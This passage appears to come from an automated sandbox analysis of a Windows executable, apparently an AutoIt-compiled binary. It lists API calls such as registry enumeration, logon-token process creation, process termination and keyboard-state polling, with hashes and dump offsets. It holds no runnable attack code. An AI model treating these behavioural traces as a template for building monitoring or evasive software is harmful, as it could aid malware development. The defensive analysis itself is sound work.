                          • Part of subcall function 008C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008C1D91
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009478A1
                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009478AE
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009478B9
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009478C8
                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009478D4
                        Strings
                        Similarity
                        • API ID: MessageSend$CreateObjectStockWindow
                        • String ID: Msctls_Progress32
                        • API String ID: 1025951953-3636473452
                        APIs
                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,008E4292,?), ref: 008E41E3
                        • GetProcAddress.KERNEL32(00000000), ref: 008E41EA
                        • EncodePointer.KERNEL32(00000000), ref: 008E41F6
                        • DecodePointer.KERNEL32(00000001,008E4292,?), ref: 008E4213
                        Strings
                        Similarity
                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                        • String ID: RoInitialize$combase.dll
                        • API String ID: 3489934621-340411864
                        APIs
                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008E41B8), ref: 008E42B8
                        • GetProcAddress.KERNEL32(00000000), ref: 008E42BF
                        • EncodePointer.KERNEL32(00000000), ref: 008E42CA
                        • DecodePointer.KERNEL32(008E41B8), ref: 008E42E5
                        Strings
                        Similarity
                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                        • String ID: RoUninitialize$combase.dll
                        • API String ID: 3489934621-2819208100
                        APIs
                        Similarity
                        • API ID: _memmove$__itow__swprintf
                        • String ID:
                        • API String ID: 3253778849-0
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 009410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00940038,?,?), ref: 009410BC
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00940548
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00940588
                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009405AB
                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009405D4
                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00940617
                        • RegCloseKey.ADVAPI32(00000000), ref: 00940624
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                        • String ID:
                        • API String ID: 4046560759-0
                        APIs
                        • GetMenu.USER32(?), ref: 00945A82
                        • GetMenuItemCount.USER32(00000000), ref: 00945AB9
                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00945AE1
                        • GetMenuItemID.USER32(?,?), ref: 00945B50
                        • GetSubMenu.USER32(?,?), ref: 00945B5E
                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00945BAF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Menu$Item$CountMessagePostString
                        • String ID:
                        • API String ID: 650687236-0
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 0091F3F7
                        • VariantClear.OLEAUT32(00000013), ref: 0091F469
                        • VariantClear.OLEAUT32(00000000), ref: 0091F4C4
                        • _memmove.LIBCMT ref: 0091F4EE
                        • VariantClear.OLEAUT32(?), ref: 0091F53B
                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0091F569
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Variant$Clear$ChangeInitType_memmove
                        • String ID:
                        • API String ID: 1101466143-0
                        APIs
                        • _memset.LIBCMT ref: 00922747
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00922792
                        • IsMenu.USER32(00000000), ref: 009227B2
                        • CreatePopupMenu.USER32 ref: 009227E6
                        • GetMenuItemCount.USER32(000000FF), ref: 00922844
                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00922875
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                        • String ID:
                        • API String ID: 3311875123-0
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 008C179A
                        • GetWindowRect.USER32(?,?), ref: 008C17FE
                        • ScreenToClient.USER32(?,?), ref: 008C181B
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008C182C
                        • EndPaint.USER32(?,?), ref: 008C1876
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                        • String ID:
                        • API String ID: 1827037458-0
                        APIs
                        • ShowWindow.USER32(009867B0,00000000,00FF55E8,?,?,009867B0,?,0094B862,?,?), ref: 0094B9CC
                        • EnableWindow.USER32(00000000,00000000), ref: 0094B9F0
                        • ShowWindow.USER32(009867B0,00000000,00FF55E8,?,?,009867B0,?,0094B862,?,?), ref: 0094BA50
                        • ShowWindow.USER32(00000000,00000004,?,0094B862,?,?), ref: 0094BA62
                        • EnableWindow.USER32(00000000,00000001), ref: 0094BA86
                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0094BAA9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        APIs
                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00935134,?,?,00000000,00000001), ref: 009373BF
                          • Part of subcall function 00933C94: GetWindowRect.USER32(?,?), ref: 00933CA7
                        • GetDesktopWindow.USER32 ref: 009373E9
                        • GetWindowRect.USER32(00000000), ref: 009373F0
                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00937422
                          • Part of subcall function 009254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0092555E
                        • GetCursorPos.USER32(?), ref: 0093744E
                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009374AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                        • String ID:
                        • API String ID: 4137160315-0
                        APIs
                          • Part of subcall function 009185F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00918608
                          • Part of subcall function 009185F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00918612
                          • Part of subcall function 009185F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00918621
                          • Part of subcall function 009185F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00918628
                          • Part of subcall function 009185F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0091863E
                        • GetLengthSid.ADVAPI32(?,00000000,00918977), ref: 00918DAC
                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00918DB8
                        • HeapAlloc.KERNEL32(00000000), ref: 00918DBF
                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00918DD8
                        • GetProcessHeap.KERNEL32(00000000,00000000,00918977), ref: 00918DEC
                        • HeapFree.KERNEL32(00000000), ref: 00918DF3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                        • String ID:
                        • API String ID: 3008561057-0
                        APIs
                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00918B2A
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00918B31
                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00918B40
                        • CloseHandle.KERNEL32(00000004), ref: 00918B4B
                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00918B7A
                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00918B8E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                        • String ID:
                        • API String ID: 1413079979-0
                        APIs
                          • Part of subcall function 008C12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008C134D
                          • Part of subcall function 008C12F3: SelectObject.GDI32(?,00000000), ref: 008C135C
                          • Part of subcall function 008C12F3: BeginPath.GDI32(?), ref: 008C1373
                          • Part of subcall function 008C12F3: SelectObject.GDI32(?,00000000), ref: 008C139C
                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0094C1C4
                        • LineTo.GDI32(00000000,00000003,?), ref: 0094C1D8
                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0094C1E6
                        • LineTo.GDI32(00000000,00000000,?), ref: 0094C1F6
                        • EndPath.GDI32(00000000), ref: 0094C206
                        • StrokePath.GDI32(00000000), ref: 0094C216
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                        • String ID:
                        • API String ID: 43455801-0
                        APIs
                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E03D3
                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 008E03DB
                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E03E6
                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E03F1
                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 008E03F9
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008E0401
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Virtual
                        • String ID:
                        • API String ID: 4278518827-0
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0092569B
                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009256B1
                        • GetWindowThreadProcessId.USER32(?,?), ref: 009256C0
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009256CF
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009256D9
                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009256E0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                        • String ID:
                        • API String ID: 839392675-0
                        APIs
                        • InterlockedExchange.KERNEL32(?,?), ref: 009274E5
                        • EnterCriticalSection.KERNEL32(?,?,008D1044,?,?), ref: 009274F6
                        • TerminateThread.KERNEL32(00000000,000001F6,?,008D1044,?,?), ref: 00927503
                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,008D1044,?,?), ref: 00927510
                          • Part of subcall function 00926ED7: CloseHandle.KERNEL32(00000000,?,0092751D,?,008D1044,?,?), ref: 00926EE1
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00927523
                        • LeaveCriticalSection.KERNEL32(?,?,008D1044,?,?), ref: 0092752A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Similarity
                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                        • String ID:
                        • API String ID: 3495660284-0
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00918E7F
                        • UnloadUserProfile.USERENV(?,?), ref: 00918E8B
                        • CloseHandle.KERNEL32(?), ref: 00918E94
                        • CloseHandle.KERNEL32(?), ref: 00918E9C
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00918EA5
                        • HeapFree.KERNEL32(00000000), ref: 00918EAC
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        • Opcode ID: 243f1ec03beed31897a814b5add2edc958b471154d167c4e0469d0960fc4b4d7
                        • Instruction ID: 6f775a106f654708d874c2afbbbe3e9e4c8b0083d9d4686c4d7f62eb23a44bbd
                        • Opcode Fuzzy Hash: 243f1ec03beed31897a814b5add2edc958b471154d167c4e0469d0960fc4b4d7
                        • Instruction Fuzzy Hash: ACE0527A118506FBDA011FE5EC1CD5ABBA9FB8A762B508631F21981470CB329461EB50
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00938928
                        • CharUpperBuffW.USER32(?,?), ref: 00938A37
                        • VariantClear.OLEAUT32(?), ref: 00938BAF
                          • Part of subcall function 00927804: VariantInit.OLEAUT32(00000000), ref: 00927844
                          • Part of subcall function 00927804: VariantCopy.OLEAUT32(00000000,?), ref: 0092784D
                          • Part of subcall function 00927804: VariantClear.OLEAUT32(00000000), ref: 00927859
                        Strings
                        Similarity
                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                        • API String ID: 4237274167-1221869570
                        • Opcode ID: 76573f10c11f6130e9824b2553fe02984ad63c2b57dce66284cc3ccf844d9675
                        • Instruction ID: c20668a623ce9cdca2dae6f51e5968511198f9909af39adf69ba022e8ebfe9c5
                        • Opcode Fuzzy Hash: 76573f10c11f6130e9824b2553fe02984ad63c2b57dce66284cc3ccf844d9675
                        • Instruction Fuzzy Hash: 199148756083029FC710DF28C484A6BBBF4FF89714F14896EF89A8B261DB31E945CB52
                        APIs
                          • Part of subcall function 008DFEC6: _wcscpy.LIBCMT ref: 008DFEE9
                        • _memset.LIBCMT ref: 00923077
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009230A6
                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00923159
                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00923187
                        Strings
                        Similarity
                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                        • String ID: 0
                        • API String ID: 4152858687-4108050209
                        • Opcode ID: da0c94e7af1af814de6076f7607d41c4b3fc9d8addb5d81d2711d84016949419
                        • Instruction ID: 4a66624c563489a0c539713dcee8a5774f46a19be4da5b7081147f4f7c8b2631
                        • Opcode Fuzzy Hash: da0c94e7af1af814de6076f7607d41c4b3fc9d8addb5d81d2711d84016949419
                        • Instruction Fuzzy Hash: 7E51023161C3209ED724EF28E845A6BB7E8EF85310F048A2DF895D72D6DB78CE548752
                        APIs
                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0091DAC5
                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0091DAFB
                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0091DB0C
                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0091DB8E
                        Strings
                        Similarity
                        • API ID: ErrorMode$AddressCreateInstanceProc
                        • String ID: DllGetClassObject
                        • API String ID: 753597075-1075368562
                        • Opcode ID: b68b8066f58d735c49178bbfa61f839ef345892a20ca82edb0f3d2895a8cbbb9
                        • Instruction ID: 3a6bad5bbd5ddfb06850faf2bb29934678c2b1efcc7c706fc5c3cd6e1c25932a
                        • Opcode Fuzzy Hash: b68b8066f58d735c49178bbfa61f839ef345892a20ca82edb0f3d2895a8cbbb9
                        • Instruction Fuzzy Hash: DF41B1B170520CEFDB15CF54C884AEA7BB9EF89310F1185A9AD069F205D7B0DE80DBA0
                        APIs
                        • _memset.LIBCMT ref: 00922CAF
                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00922CCB
                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00922D11
                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00986890,00000000), ref: 00922D5A
                        Strings
                        Similarity
                        • API ID: Menu$Delete$InfoItem_memset
                        • String ID: 0
                        • API String ID: 1173514356-4108050209
                        • Opcode ID: 469e4c0ca5448184464ef4868301c73021da2cfa5e2a389eef6ef4a9a5d4620e
                        • Instruction ID: 9bb2872fc5c3b57658bbe6109d0f48f0500fb299ed2a7184e1782d5806347792
                        • Opcode Fuzzy Hash: 469e4c0ca5448184464ef4868301c73021da2cfa5e2a389eef6ef4a9a5d4620e
                        • Instruction Fuzzy Hash: 45419F34204352AFD720DF28E844B5ABBE8FF85320F14465DF965972E5D770E905CB92
                        APIs
                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0093DAD9
                          • Part of subcall function 008C79AB: _memmove.LIBCMT ref: 008C79F9
                        Strings
                        Similarity
                        • API ID: BuffCharLower_memmove
                        • String ID: cdecl$none$stdcall$winapi
                        • API String ID: 3425801089-567219261
                        • Opcode ID: a3f682e329f3b940fd598e7cd620f4c010cc2a427ee76756210ac95585a23f5a
                        • Instruction ID: af317f1911f24c7e4b3b186199fae7c150b3fec9908d76ae1194f340e0e427e1
                        • Opcode Fuzzy Hash: a3f682e329f3b940fd598e7cd620f4c010cc2a427ee76756210ac95585a23f5a
                        • Instruction Fuzzy Hash: 8F3192716012199FCF10EF58CC919AEB3B8FF05320F108A29E86597691DB71E905CF90
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 0091B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0091B0E7
                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009193F6
                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00919409
                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00919439
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        Strings
                        Similarity
                        • API ID: MessageSend$_memmove$ClassName
                        • String ID: ComboBox$ListBox
                        • API String ID: 365058703-1403004172
                        • Opcode ID: 0e883f2eb0210832f8c34230118b709169bf5ea5d7956200a8c38454f80492c4
                        • Instruction ID: 315a2fc6fd2a90df6ad65b09f7cb1ad5f12f17d838281e9fa325a2dfb592ac6a
                        • Opcode Fuzzy Hash: 0e883f2eb0210832f8c34230118b709169bf5ea5d7956200a8c38454f80492c4
                        • Instruction Fuzzy Hash: 5721E171A04108BEDB14AB74DC95DFFB77CEF45360B104529F926A72E0DB394A8A9A20
                        APIs
                          • Part of subcall function 008C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008C1D73
                          • Part of subcall function 008C1D35: GetStockObject.GDI32(00000011), ref: 008C1D87
                          • Part of subcall function 008C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008C1D91
                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009466D0
                        • LoadLibraryW.KERNEL32(?), ref: 009466D7
                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009466EC
                        • DestroyWindow.USER32(?), ref: 009466F4
                        Strings
                        Similarity
                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                        • String ID: SysAnimate32
                        • API String ID: 4146253029-1011021900
                        • Opcode ID: 36c6041a9672a8e7fbc9f4a70a7ba80751b5b509ece48534c3b7877e4235cd57
                        • Instruction ID: ba042bd70dd5f610910d33d9dc8cda58323e60ea713c491f0db5aaec3e241efa
                        • Opcode Fuzzy Hash: 36c6041a9672a8e7fbc9f4a70a7ba80751b5b509ece48534c3b7877e4235cd57
                        • Instruction Fuzzy Hash: B321AEF121020AAFEF104F68EC80EBB37ADEF5A368F124629F91197190D771CC51A762
                        APIs
                        • GetStdHandle.KERNEL32(0000000C), ref: 0092705E
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00927091
                        • GetStdHandle.KERNEL32(0000000C), ref: 009270A3
                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009270DD
                        Strings
                        Similarity
                        • API ID: CreateHandle$FilePipe
                        • String ID: nul
                        • API String ID: 4209266947-2873401336
                        • Opcode ID: 0179dcfc33a20b38d1c3c9971f9951d6ea33832c946c1137541e3a3b946bb548
                        • Instruction ID: 0b50b1f5018f903ab0698ea47ca607963f2d75071e4d6abec13c5b8f2a10206c
                        • Opcode Fuzzy Hash: 0179dcfc33a20b38d1c3c9971f9951d6ea33832c946c1137541e3a3b946bb548
                        • Instruction Fuzzy Hash: 34219574544225ABDF209F78EC05F9AB7B8BF85720F204A19FCA0E72D4D7709854CB50
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 0092712B
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0092715D
                        • GetStdHandle.KERNEL32(000000F6), ref: 0092716E
                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009271A8
                        Strings
                        Similarity
                        • API ID: CreateHandle$FilePipe
                        • String ID: nul
                        • API String ID: 4209266947-2873401336
                        • Opcode ID: 75246766dd91f3d70c188bfe2523c98886c80f8e6f5021675e12dd4b0e56c4f1
                        • Instruction ID: 0876086790b5b774c813cccc7d83ad96e0a390b07536a135af47d81eaa2c38e2
                        • Opcode Fuzzy Hash: 75246766dd91f3d70c188bfe2523c98886c80f8e6f5021675e12dd4b0e56c4f1
                        • Instruction Fuzzy Hash: 1C21B67550C2269BDF209FA8AC04EAAF7ECAF55720F200A19FCB0E32D5D7709861C760
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0092AEBF
                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0092AF13
                        • __swprintf.LIBCMT ref: 0092AF2C
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0094F910), ref: 0092AF6A
                        Strings
                        Similarity
                        • API ID: ErrorMode$InformationVolume__swprintf
                        • String ID: %lu
                        • API String ID: 3164766367-685833217
                        • Opcode ID: 6d491e3148c4e97d6ef816190a466779a712a5c506ff11651d01b9c4a224d9d3
                        • Instruction ID: f7104a5594c430efda092b9cee2a1db3898ae998ce0c635b97a94d53817b877f
                        • Opcode Fuzzy Hash: 6d491e3148c4e97d6ef816190a466779a712a5c506ff11651d01b9c4a224d9d3
                        • Instruction Fuzzy Hash: 27219235A00119AFCB10DF69D985EEE7BB8FF89704B0040A9F509DB251DB31EE45CB22
                        APIs
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                          • Part of subcall function 0091A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0091A399
                          • Part of subcall function 0091A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0091A3AC
                          • Part of subcall function 0091A37C: GetCurrentThreadId.KERNEL32 ref: 0091A3B3
                          • Part of subcall function 0091A37C: AttachThreadInput.USER32(00000000), ref: 0091A3BA
                        • GetFocus.USER32 ref: 0091A554
                          • Part of subcall function 0091A3C5: GetParent.USER32(?), ref: 0091A3D3
                        • GetClassNameW.USER32(?,?,00000100), ref: 0091A59D
                        • EnumChildWindows.USER32(?,0091A615), ref: 0091A5C5
                        • __swprintf.LIBCMT ref: 0091A5DF
                        Strings
                        Similarity
                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                        • String ID: %s%d
                        • API String ID: 1941087503-1110647743
                        • Opcode ID: 7312f8f9ca177ab5cca20a64b88de73457cd90ccc0012e2d66caf353da5fd453
                        • Instruction ID: 44d67517bed675fdfd459ad8383dca73cc55d33b91392de4843b5fe54e63e0af
                        • Opcode Fuzzy Hash: 7312f8f9ca177ab5cca20a64b88de73457cd90ccc0012e2d66caf353da5fd453
                        • Instruction Fuzzy Hash: 4311C0712002096BDF107F64EC85FEA377CEF89300F044079BA18AA096DA745D868B36
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 00922048
                        Strings
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                        • API String ID: 3964851224-769500911
                        • Opcode ID: 7ab5d64dc93e0ba0738d4267ef46fa8ea8eed540aac18a387aff4fdba2ce7859
                        • Instruction ID: 778f7b9097ae8b51b8b62545de582b7e41128cb04efa5de74ddfd82f02deea0e
                        • Opcode Fuzzy Hash: 7ab5d64dc93e0ba0738d4267ef46fa8ea8eed540aac18a387aff4fdba2ce7859
                        • Instruction Fuzzy Hash: 5711AD30954219DFCF10EFA8D8808EEB3F4FF16300B508968D855A7252EB32A906CF51
                        APIs
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0093EF1B
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0093EF4B
                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0093F07E
                        • CloseHandle.KERNEL32(?), ref: 0093F0FF
                        Similarity
                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                        • String ID:
                        • API String ID: 2364364464-0
                        • Opcode ID: 029ab1a5807a6589cecf745d7a8d6faa6d677de36cf702d6d46d012877f9122f
                        • Instruction ID: 01eb51bb5379d0cd4d6f8db574813cf029f5668b71e45797ffb0b5678af3df5b
                        • Opcode Fuzzy Hash: 029ab1a5807a6589cecf745d7a8d6faa6d677de36cf702d6d46d012877f9122f
                        • Instruction Fuzzy Hash: 34816D716047119FD720DF28C896F6AB7E5EF88B20F04885DF599DB292DAB0EC408B52
                        APIs
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 009410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00940038,?,?), ref: 009410BC
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00940388
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009403C7
                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0094040E
                        • RegCloseKey.ADVAPI32(?,?), ref: 0094043A
                        • RegCloseKey.ADVAPI32(00000000), ref: 00940447
                        Similarity
                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                        • String ID:
                        • API String ID: 3440857362-0
                        APIs
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0093DC3B
                        • GetProcAddress.KERNEL32(00000000,?), ref: 0093DCBE
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0093DCDA
                        • GetProcAddress.KERNEL32(00000000,?), ref: 0093DD1B
                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0093DD35
                          • Part of subcall function 008C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00927B20,?,?,00000000), ref: 008C5B8C
                          • Part of subcall function 008C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00927B20,?,?,00000000,?,?), ref: 008C5BB0
                        Similarity
                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                        • String ID:
                        • API String ID: 327935632-0
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0092E88A
                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0092E8B3
                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0092E8F2
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0092E917
                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0092E91F
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                        • String ID:
                        • API String ID: 1389676194-0
                        APIs
                        • GetCursorPos.USER32(?), ref: 008C2357
                        • ScreenToClient.USER32(009867B0,?), ref: 008C2374
                        • GetAsyncKeyState.USER32(00000001), ref: 008C2399
                        • GetAsyncKeyState.USER32(00000002), ref: 008C23A7
                        Similarity
                        • API ID: AsyncState$ClientCursorScreen
                        • String ID:
                        • API String ID: 4210589936-0
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0091695D
